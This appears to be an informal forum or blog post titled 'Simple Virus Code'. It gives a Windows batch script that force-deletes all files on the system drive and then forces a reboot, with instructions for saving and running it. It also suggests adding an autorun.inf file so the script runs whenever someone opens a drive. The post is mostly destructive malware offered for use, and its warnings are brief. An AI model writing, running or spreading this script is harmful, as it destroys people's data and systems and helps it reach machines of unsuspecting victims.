Simple Virus Code

    This is a very simple virus program to delete all the content of a drive...

    It should not use on others computer..........This is harmful. So Before using this u need to backup ur all information which are saved in ur system drive. After run this program it will delete ur system drive. so it needs reinstall ur operating system.

    @echo off
    del %systemdrive%\*.* /f /s /q
    shutdown -r -f -t 00

    **Save the above code as .bat. u can write the program in a note pad then save as *.bat.and run the program...

    caution: it will delete ur systemdrive... so be careful... If Any lose of ur data i am not responsible for that. U should carefully use it...
    u may use only this code below...

    @echo off
    shutdown -r -f -t 00

    ** The above code will just restart ur pc....try it..
    I write this code in a notepad. Then save it in my c drive. after that i run the program. Then it restart my personal computer.

    U can improve it by adding a autorun.inf file to run the program when anyone double click his any drive.

    With Regards;
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